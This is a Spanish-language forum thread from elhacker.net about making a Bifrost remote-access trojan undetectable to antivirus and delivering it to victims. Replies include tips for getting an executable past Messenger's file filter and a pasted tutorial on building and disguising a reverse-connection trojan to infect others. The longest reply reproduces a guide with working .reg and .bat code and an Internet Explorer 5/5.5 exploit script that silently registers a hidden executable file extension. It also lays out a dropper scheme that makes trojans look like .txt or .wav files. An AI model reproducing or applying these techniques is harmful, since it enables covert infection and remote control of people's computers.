elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales
| | |-+  Bifrost v1.2 (Indetectable)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Bifrost v1.2 (Indetectable)  (Leído 5,048 veces)
Komputilo

Desconectado Desconectado

Mensajes: 39



Ver Perfil
Bifrost v1.2 (Indetectable)
« en: 9 Abril 2009, 20:13 »

Tengo el Kaspersky Internet Security 2009.
Cuando escaneo el server del Bifrost no me detecta nada, sisi, el server sin pasarle ningun programa estilo themida, crypter, blinder, joiner...
El problema viene que cuando lo junto con una foto me detecta como troyano.
Y lo peor es que cuando lo envio por Mesenger, al que lo recibe, no le deja abrirlo, debido a que dice que no es seguro.
Ayuda plis.


(Porcierto, si me posteais algun manual para dejarlo indetectable sin usar el el HOLLYBIG o algo asi, os estare muy agradecidos)


En línea

La informatica es un arte... Y yo un artista. :D
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: Bifrost v1.2 (Indetectable)
« Respuesta #1 en: 9 Abril 2009, 20:28 »

Será problema de que el joiner que estas usando es demasiado antiguo, y por lo tanto, detectado...

Usa el nuevo Cactus Metamorph de MadAntrax, ya te lo dije en tu otro post...


En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
DrasieR

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: Bifrost v1.2 (Indetectable)
« Respuesta #2 en: 12 Mayo 2009, 16:40 »

Será problema de que el joiner que estas usando es demasiado antiguo, y por lo tanto, detectado...

Usa el nuevo Cactus Metamorph de MadAntrax, ya te lo dije en tu otro post...



el mismo MadAntrax dice q NO funciona con bifrost o poison
En línea

ank2909

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: Bifrost v1.2 (Indetectable)
« Respuesta #3 en: 13 Mayo 2009, 21:29 »

puede ser cierto k el joiner sea demasiado antiguo y te lo detecte por eso pero referente a lo del mesenguer aver prueba enviando la extension directamente en .exe para poder enviarlo directamente para k no te lo blokee debes poner tres puntos para que pueda ser enviado un ejemplo..

Archivo original:

TROYANO.EXE

ARCHIVO ENVIADO:

TROYANO.EXE...

solo debes poner eso cambias el .exe ii le pones los tres puntitos y listo debe dejarte enviar el troyano o mejor dicho el ejecutable lo malo k puede k su av si lo detecte pero todo es cuestion de probar; si necesitas algo o otro problema avisa! k intentare solucionarlo



Saludos;
En línea

[u]nsigned


Desconectado Desconectado

Mensajes: 1.988


Ver Perfil WWW
Re: Bifrost v1.2 (Indetectable)
« Respuesta #4 en: 4 Junio 2009, 05:19 »

Aun funkan los trojans? xD

Si quieren aprender a 'hackear' hagan cosas mas serias... :¬¬ y esto lo digo como novato sin praticamente ningun conocimiento de hacking :rolleyes:

Saludos
En línea

sudo suck --mycock -o force
J-Hide

Desconectado Desconectado

Mensajes: 76



Ver Perfil
Re: Bifrost v1.2 (Indetectable)
« Respuesta #5 en: 4 Junio 2009, 20:05 »

buscad hay un montón de tutoriales.

Lo que te pasa a ti es que supongo que el juntar el server con una foto mediante un joiner este joiner deja "marca" y esta es detectada. Lo raro es que sin hacerle nada al server sea indetectable...

Puedes usar un montón de joiners y encriptadores, busca aqui o en google.
Citar
Aun funkan los trojans? xD

Si quieren aprender a 'hackear' hagan cosas mas serias... :¬¬ y esto lo digo como novato sin praticamente ningun conocimiento de hacking :rolleyes:

Saludos

Que los troyanos no se usan???  Un novato como quieres que empieze?? Vamos no se va a poner a fabricar su propio troyano o lo que sea si apenas sabe que es una IP... SI pudiera hacer "cosas más serias" no andaria con tonterias...

Saludos.
En línea

Cogito, ergo non sum
[u]nsigned


Desconectado Desconectado

Mensajes: 1.988


Ver Perfil WWW
Re: Bifrost v1.2 (Indetectable)
« Respuesta #6 en: 4 Junio 2009, 20:29 »

Antes que nada quiero aclarar que NO  me referi a los novatos que usan troyanos en forma despectiva, para que no alla mal entendidos.  ;D

Un novato como quieres que empieze?? Vamos no se va a poner a fabricar su propio troyano o lo que sea si apenas sabe que es una IP... SI pudiera hacer "cosas más serias" no andaria con tonterias...

Que empiezen de la 'forma lenta y aburrida': leyendo manuales sobre IP, puertos, scannig, bugs etc..; aprendiendo lo basico sobre SO's, algo de C++...ese tipo de cosas.

Para mi (y esto es opinion personal, que cada uno puede o no compartir :)) el problema de iniciarse con troyanos es:

1.A la gente a la que le podes llegar a hacer algo con troyanos, no vale la pena hacerle nada. Es decir, tiene que ser un usuario medio de pc con aun menos conocimientos que los propios.

2.Suponiendo que superas el 'nivel' de novato, te das cuenta de que perdiste un monton de tiempo haciendo troyanos indetectables, en lugar de leer RFC's y ese tipo de cosas. :P

Y, por lo general, con los troyanos y toda esa raza de malware en la que se consiguen resultados con un solo par de clicks ya sabemos en que termina...

Saludos
« Última modificación: 4 Junio 2009, 20:31 por [u]nsigned » En línea

sudo suck --mycock -o force
d1a2v3i4d

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Bifrost v1.2 (Indetectable)
« Respuesta #7 en: 7 Junio 2009, 01:29 »

TE PASO MI MANUALES ,.
Cómo crear un virus troyano
Introducción

En este tutorial vamos a aprender a crear un virus troyano. Pero primero, como muchos se preguntaran, ¿qué es un virus troyano?

Un virus troyano es un virus con el que puedes manejar el ordenador de tu víctima (la persona a la que infectes) como si fuera el tuyo. Podrás bajarte archivos de su ordenador, subirle archivos, abrirlos tanto en tu ordenador como en el suyo, finalizarle procesos, etc. Todo lo que puedes hacer lo veremos más adelante.
Tipos de troyanos

Se pueden diferenciar dos tipos de troyanos, dependiendo de cómo se conecten a nuestro ordenador:

De conexión directa, con los que sacamos el ip de la víctima y a través de ésta nos conectamos a su ordenador. El problema es que los ips no suelen ser fijos, suelen cambiar cada vez que enciendes el ordenador, por lo que tenemos que sacar el ip cada vez que querramos conectarnos.

De conexión inversa, con los que no tenemos que sacar el ip a la víctima, ya que una vez que ejecuten el troyano se conectarán automáticamente cada vez que enciendan el ordenador.

Lógicamente los mejores son los de conexión inversa, y por lo tanto son los que os enseñaré a hacer.
Partes de un troyano

En un troyano se pueden diferenciar dos partes: el servidor y el cliente.

El servidor es el virus en sí, el archivo que debe abrir la víctima en su ordenador para infectarse y que una vez infectada se conectará con el tuyo.

El cliente es el archivo que debes abrir en tu ordenador para controlar remotamente el de tu víctima.

Una vez dicho esto, vamos a proceder a crear nuestro troyano.
1. Conseguir una no-ip

Una vez que infectes a alguien podrás controlar su ordenador gracias a que el virus (si es de conexión inversa) manda la información a tu ip, recibiéndola en tu ordenador. Pero aquí hay un problema, como hemos dicho antes las ips no suelen ser fijas, por lo que acabarías perdiendo la conexión con tu víctima. Logicamente la solución a este problema es crear una ip estática (que siempre sea la misma) y dirigirla a tu ordenador, y ésta es conocida como no-ip. Podrás ver como se crea una no-ip en el manual de Cómo conseguir una no-ip.
2. Crear el troyano con bifrost

Hay muchos virus troyanos de conexión inversa, entre los que los mas famosos son el bifrost y el poison, pero hay muchos más como el pro rat, el slh4, el coolvides, etc.

Aquí vais a aprender a crear el bifrost por ser el más famoso, para ello ir al manual bifrost.
3. Hacer el virus indetectable

Está claro que el virus así no se lo vamos a colar a nadie, porque lo detectan todos los antivirus, por lo que vamos a hacerlo indetectable. Podeis ver como hacerlo indetectable en: Hacer tu server indetectable
4. Camuflar el virus

Ya sólo nos queda meterle el virus a quien nos caiga mal, pero el virus no se lo podemos mandar tal cual porque se dará cuenta aunque el antivirus no lo detecte. Lo que vamos a hacer es incluirlo en un archivo de forma que cuando lo ejecute se abran los dos, el archivo y el virus. El problema es que el archivo resultante será .exe, aunque al abrirlo sea una imagen o un video, por lo que será mejor pensar bien cómo pasarle el virus a nuestra víctima. Para ver como camuflar el virus ve a camuflar el server.

Y hasta aquí llega el tutorial de troyanos, espero que te haya servido, si tienes alguna duda o quieres opinar sobre el manual puedes ponerlo en la sección hacking del foro.

hay te va otro
En línea

d1a2v3i4d

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Bifrost v1.2 (Indetectable)
« Respuesta #8 en: 7 Junio 2009, 01:35 »

Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable

Aunque no sea muy habitual, es posible hacer pasar un troyano ( virus, o cualquier otro ejecutable) por un archivo de texto (.txt), de audio (.wav), una carpeta, o cualquier otro tipo de archivo (si, cualquiera).

Estos archivos son en realidad troyanos, y como puedes ver parecen archivos inofensivos.
Vamos a ver como se consigue hacer pasar un ejecutable por cualquier otro archivo en apariencia inofensivo.

La técnica consiste en "contaminar" el sistema, de manera que una vez infectado, sea vulnerable a este método y sea él mismo el que haga parecer a los archivos maliciosos, archivos totalmente inofensivos.
Increíblemente se trata de un método facilísimo.
Vamos a explicar paso a paso como se hace, para poder así saber como tenemos que protegernos de este posible ataque.

Lo que vamos a hacer es crear una extensión nueva, darle características de ejecutable, y ocultarla, crearemos en este ejemplo la extensión ".troj" .
De esta forma lo que nosotros tenemos es un archivo, por ejemplo, "server.exe", al que le hemos puesto el icono propio del txt, lo renombramos a "server.txt.troj", tras "contaminar" el sistema de la víctima, la extensión .troj, no solo será reconocida como ejecutable, sino que incluso desaparecerá, y por lo tanto lo que tendremos como resultado será un archivo server.txt (que se puede renombrar como readme.txt por ejemplo) en el que al hacer click se ejecutará el "server.exe".


CREANDO LA EXTENSIÓN:

Antes de pensar en otras cosas, lo primero es saber como podemos hacer que se cree nuestra extensión en el PC de la víctima.
Para crear una extensión, es necesario añadir las claves adecuadas al registro, y para ello se utilizan los archivos ".reg"
En este punto vamos a diferenciar entre Windows98 y Windows NT/2000/XP, puesto que hay ciertas cosas que varían entre uno y otro, el ejemplo que vamos a crear está pensado para que funcione en NT/2000/XP, para Windows98 no tiene mayor complicación, pero hay que cambiar algunas cosas.
Con estas líneas añadimos lo que necesitamos al registro:

REGEDIT4
[HKEY_CLASSES_ROOT\.troj]
@="trojfile"
[HKEY_CLASSES_ROOT\trojfile]
@="Documento de texto"
"NeverShowExt"=""
[HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]
@=""%1" %*"

Vamos a explicarlo un poco para el que no lo entienda:
REGEDIT4
Es la cabecera que indica que es un archivo de registro, dependiendo del sistema, también podría poner "Windows Registry Editor Version 5.00", según la versión.
[HKEY_CLASSES_ROOT\.troj]
Añadimos a la clave HKEY_CLASSES_ROOT la extensión ".troj", en HKEY_CLASSES_ROOT, se encuentra el registro de todas las extensiones y los tipos de archivo conocidos por nuestro sistema.
@="trojfile"
La "@" se utiliza para añadir claves con el valor de (Predeterminado)
"trojfile" es el tipo de archivo al que pertenecerán los archivos con extensión ".troj"
Para que lo entiendas mejor, abre el regedit32.exe, y ve hasta HKEY_CLASSES_ROOT, verás que la extensión, por ejemplo, ".txt" está asociada con los "txtfile", la ".exe" está asociada con los "exefile" etc.
[HKEY_CLASSES_ROOT\trojfile]
Añadimos el tipo de archivo "trojfile"
@="Documento de texto"
Esta es la clave que define a los "trojfile" (los ".troj") como documentos de texto, gracias a ello, cuando alguien vea las propiedades del documento, verá en "Tipo de archivo:" el valor "Documento de texto".
"NeverShowExt"=""
Esta clave es un punto fundamental en el proceso, añadiendo esta clave a cualquier tipo de archivo conseguimos que la extensión del archivo desaparezca.
La clave "NeverShowExt" es la responsable de que cierto tipo de extensiones no se vean.
Estas son las extensiones que permanecen invisibles:
.cnf
.lnk
.pif
.scf
.shb
.shs
.url
El hecho de que estas extensiones permanezcan ocultas se debe a que poseen la clave en el registro "NeverShowExt". Todas las extensiones que tengan este atributo en el registro, permanecerán invisibles en Windows aunque lo tengamos configurado para ver todas las extensiones.
Por lo tanto nosotros la añadiremos a nuestro tipo de archivo para hacer desaparecer nuestra extensión.
[HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]
Esta es la ruta en la que hay que poner qué programa se utilizará para abrir ese tipo de archivo.
@=""%1" %*"
Esto indicará que se abra como cualquier otro ejecutable, en este punto es donde se define, por ejemplo que los .txt se abran con el notepad.exe poniendo algo así:
@="%SystemRoot%\system32\NOTEPAD.EXE %1".

Bien, metiendo todo esto en un ".reg" ya tenemos lo que buscábamos. Al pinchar sobre el ".reg" se añadirá automáticamente la nueva extensión al registro, y el archivo "server.txt.troj" se transformará en "server.txt" (con el icono del txt porque anteriormente habíamos modificado el "server.exe" para que llevara este icono).

Hasta aquí, como idea no esta mal, pero sabemos que sólo un usuario del grupo de administradores tiene permiso para manejar el registro. por lo tanto debemos buscar la manera de que sea el administrador del sistema el que se contamine.

No voy a explicar aquí ninguno de los métodos de intrusión, puesto que creo que ya están bastante explicados, y no es el propósito de este texto. partimos del supuesto de que se consigue engañar al admin y hacerle ejecutar un archivo que contenga no sólo un troyano, sino este método de "contaminación" del sistema, que una vez llevado a cabo, servirá para posteriores infecciones.
Es decir, una vez que alguien está contaminado, se le pueden mandar por el IRC, o por Mail troyanos renombrados a "readme.txt.troj", "sonido.wav.troj" etc. Con la ventaja de que a ojos de la víctima aparecerán como "readme.txt", "sonido.wav" etc, archivos que eludirán los filtros de los scripts de IRC que bloquean las extensiones conocidas como peligrosas (.exe, .bat, .vb script: Actualizado el 14-12-2001

Hablando un dia sobre este articulo con [^eLaiM^] , surgió la posibilidad de recrear este método de "contaminación" del sistema mediante un HTML. El código siguiente es el resultado de estudiar esa posibilidad.

Vamos a valernos de la vulnerabilidad del Internet Explorer en sus versiones 5 y 5.5, explicada aquí y que permite que un atacante modifique el registro de la víctima.

El código fuente que debemos utilizar sería este:

#script#
document.write("");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

#/script#

(sustituye los simbolos "#script#" y "#/script#" por "" para que funcione ).

Si el atacante, consigue que la víctima abra este código ( metido en un html ) ya sea por web o por mail, conseguirá que en el PC de la víctima se cree la extensión maliciosa que "contaminará" el sistema.

Este método es válido para "contaminar" sistemas Win9x/NT/2K


2.-Mediante un ejecutable:

(Vamos a fabricar un ejecutable, de una manera fácilmente entendible que cree la extensión maliciosa en el PC de la víctima).

Crear un exe que añada las claves al registro no representa ningún problema, para cualquiera con conocimientos de programación, pero, como siempre vamos a tratar de demostrar que no hacen falta grandes conocimientos para llevar a cabo estos ataques.
Vamos a valernos de un ".bat" para crear el .reg, de manera que cuando la víctima pinche en el .bat, éste cree en el ".reg" y lo ejecute, evidentemente de manera silenciosa.

Éste es el ".bat" que tenemos que crear, lo vamos a llamar "troj.bat":

@echo off
@echo REGEDIT4>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\.troj]>>%TEMP%\troj.reg
@echo @="trojfile">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile]>>%TEMP%\troj.reg
@echo @="Documento de texto">>%TEMP%\troj.reg
@echo "NeverShowExt"="">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]>>%TEMP%\troj.reg
@echo @=""%1" %*">>%TEMP%\troj.reg
regedit /s %TEMP%\troj.reg
del %TEMP%\troj.reg

Como vemos cuando se ejecute el "troj.bat", se creará el archivo "troj.reg" en la carpeta de archivos temporales, por último añadimos 2 líneas:
regedit /s %TEMP%\troj.reg
ejecutará el "troj.reg" para que se añadan las claves al registro.
del %TEMP%\troj.reg
borra el troj.reg una vez ejecutado, para no dejar rastro.

Pero surge aquí un problema en la línea:
@echo @=""%1" %*">>%TEMP%\troj.reg
si hiciéramos así el "troj.bat", crearía un "troj.reg" en el que en vez de aparecer @=""%1" %*" aparecería simplemente @=""
y por lo tanto los archivos con extensión ".troj" no serían ejecutables.
Para solucionarlo sustituimos:
@echo @=""%1" %*">>%TEMP%\troj.reg
por:
@echo @=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%\troj.reg
No hemos hecho mas que sustituirlo por su equivalente hexadecimal, ahora la clave será correctamente introducida en el "troj.reg" (quedará así: @=""%1" %*" ).




-------------NOTA--------------

Si el sistema infectado es un NT/2K/XP podemos hacer el troj.bat de otra manera, puesto que existen comandos específicos para añadir extensiones y tipos de archivo al registro, los comandos son: "assoc" y "ftype" ( si quieres saber mas acerca de estos comandos, sólo tienes que escribir en una ventana de comandos "assoc /?" o "ftype /?"). Utilizando estas ordenes vamos a hacer que nuestro "troj.bat" añada automáticamente la extensión y el tipo de archivo al registro sin tener que pasar por el "troj.reg", "troj.bat"quedaría así:

assoc .troj=trojfile
ftype trojfile="%1" %*

El comando "assoc" sirve para añadir una extensión al registro y el "ftype" sirve para añadir un tipo de archivo
Pero por este método no podemos añadir la clave "NeverShowExt"="", y la extensión .troj quedaría a la vista, por lo tanto de todas maneras tendríamos que crear el "troj.reg", de esta manera

@echo off
assoc .troj=trojfile
ftype trojfile="%1" %*
@echo Windows Registry Editor Version 5.00>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile]>>%TEMP%\troj.reg
@echo @="Documento de texto">>%TEMP%\troj.reg
@echo "NeverShowExt"="">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]>>%TEMP%\troj.reg
@echo @=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%\troj.reg
regedit /s %TEMP%\troj.reg
del %TEMP%\troj.reg


Vamos a quedarnos por lo tanto con el primero de los ejemplos que hicimos, sin utilizar los comandos "assoc" y "ftype".

---------FIN DE LA NOTA---------



Hasta aquí ya hemos conseguido crear un archivo que nos cree una nueva extensión, oculta y ejecutable. Si ahora la víctima recibe un archivo con icono, por ejemplo de txt, llamado readme.txt.troj, será incapaz de distinguirlo entre un txt y un ejecutable.


CREANDO EL ENGAÑO

Vamos a ver el proceso paso a paso para poner en claro lo fácil que es contaminar un sistema para dejarlo vulnerable a posteriores ataques.

Creamos el troj.bat, de la manera que ya explicamos mas arriba, y lo convertimos en troj.exe utilizando el primero el bat2exe (http://www.computerhope.org/download/utility/bat2exe.com),para convertirlo en troj.com, y después el C2E.COM y lo convertimos en troj.exe (podríamos haberlo dejado como troj.bat, pero siempre es interesante hacer las cosas bien).

La táctica consiste en unir el troj.exe a otro archivo inofensivo, como por ejemplo uno de esas animaciones en Flash con extensión .exe

Necesitamos juntar los dos ejecutables en uno, para ello vamos a utilizar el "DropperGen" esta es la web oficial (http://www.oblivionrat.com) que unido al "lcc-win32" (http://www.cs.virginia.edu/~lcc-win32/) unirá ambos archivos dejándolos en uno (gracias al método que utiliza para unir los archivos eludirá el scan de gran parte de los antivirus).


El archivo resultante pasará por una broma, pero el sistema quedará "contaminado" con la extensión ".troj" en su registro, después de esto se le pueden mandar archivos ejecutables y hacerlos pasar por archivos inofensivos.

Vamos a suponer que ahora pretendemos infectar a la víctima con un troyano:

Elegimos el server de un troyano (server.exe)
Lo primero que hacemos es cambiarle el icono por el de los .txt, para ello, lo cogemos del archivo archivo "shell32.dll", situado en la carpeta system32, utilizando, por ejemplo, el "Iconedit" (http://www.ad.ugatu.ac.ru/iconedit/)

Una vez que ya lo tenemos, utilizamos el ResHack (http://delphi.icm.edu.pl/ftp/tools/ResHack.zip) para cambiarle el icono al server.exe.

Al archivo resultante lo llamamos por ejemplo "license.txt.troj", y no queda nada mas que mandárselo a la víctima, aunque para nosotros el archivo aparezca así:

Para la víctima el archivo se verá así:

Creo que no es necesario decir lo peligroso que puede ser esto, puesto que no creo que nadie dude un instante en abrir un archivo de texto, porque no se cree que pueda ser peligroso.

Usando este método podemos darle a los archivos la extensión (la falsa) y el icono que queramos cada vez.

Se puede evitar la fase de cambiar el icono al server añadiendo unas líneas mas al registro, en la que atribuyamos un icono específico para los archivos ".troj", por ejemplo:

@echo [HKEY_CLASSES_ROOT\txtfile\DefaultIcon]>>%TEMP%\troj.reg
@echo @="%SystemRoot%\system32\shell32.dll,-152">>%TEMP%\troj.reg

para añadir el icono del .txt a los archivos .troj, que por las mismas razones que antes (lo de el %) debemos sustituir :

@echo @="%SystemRoot%\system32\shell32.dll,-152">>%TEMP%\troj.reg

por:

@echo @=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,
00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,
65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,31,00,35,
00,32,00,00,00>>%TEMP%\troj.reg

en una sola linea, para añadir el icono de los .wav a los archivos .troj cambiaría la última linea por esta:

@echo @="%SystemRoot%\System32\quartz.dll,-200">>%TEMP%\troj.reg

que ahora quedaría:

@echo @=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,
00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,
71,00,75,00,61,00,72,00,74,00,7a,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,32,
00,30,00,30,00,00,00>>%TEMP%\troj.reg

también en una sola linea.

-------------NOTA--------------

Para encontrar el equivalente hexadecimal del icono que buscas, puedes hacerlo fácilmente sin necesidad de editores hexadecimales.

Abre el regedit, busca el tipo de archivo que quieres, abre la carpeta "DefaultIcon", marca el valor en el que pone (Predeterminado) bla bla.

Vete a "Registro">>"Exportar archivo de Registro..." introduce el nombre que quieras y dale a aceptar.

Edita con un editor de texto el archivo ".reg" que acabas de crear y ahí tienes el valor hexadecimal que corresponde a la cadena que quieres poner, y que no puedes añadir por contener el caracter %

---------FIN DE LA NOTA---------



La ventaja es que no corremos el riesgo de estar añadiendo un icono característico del Windows 2000, por ejemplo, y enviárselo después a alguien que utilice Windows 98.

El inconveniente es que estaremos limitados a ocultar siempre el server.exe bajo el mismo tipo de archivos.


INTRUSIÓN Y CONTAMINACIÓN DEL SISTEMA


Por supuesto se puede contaminar el sistema sin tener que esperar para mandarle el server.exe posteriormente.

Ejemplo 1:

Incluyendo los 3 archivos, es decir, el ".bat" (pasado a ".exe"), el server.exe y el archivo inofensivo (con el que se engaña a la víctima), en uno solo, con el "DropperGen"

Ejemplo 2:

Metiendo el "server.exe" y el "troj.bat" en una "carpeta trucada" ( Si no conoces como se hacen, lo tienes en la sección "Carpetas Infectadas"), en concreto en la carpeta trucada aparentemente vacía.

Podrías incluso añadir esto al "troj.bat":

@echo copy server.exe %SYSTEMROOT%\WinReadme.txt.troj
@echo %SYSTEMROOT%\WinReadme.txt.troj
@echo del server.exe
@echo del troj.bat

de esta forma el troyano se copiará a la carpeta WINNT (WINDOWS si es un 98) con el nombre WinReadme.txt.troj, después se ejecutará, y se borrarán todos los archivos de la carpeta modificada.

Después de esto, el sistema quedará contaminado, el server del troyano tendrá apariencia de txt, y la carpeta quedará realmente vacía.

Ejemplo 3:

Si tienes los passwords del PC remoto, puedes acceder directamente al registro remoto, introducir las claves manualmente y dejar el sistema contaminado.

Ejemplo 4:

Piensa un poco y seguro que se te ocurren muchas otras maneras.

Texto escrito por CyRuX
En línea

[u]nsigned


Desconectado Desconectado

Mensajes: 1.988


Ver Perfil WWW
Re: Bifrost v1.2 (Indetectable)
« Respuesta #9 en: 7 Junio 2009, 04:27 »

buen aporte!! ;D

Pero hubiera sido mejor si habrias un hilo nuevo...xD

Saludos
En línea

sudo suck --mycock -o force
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines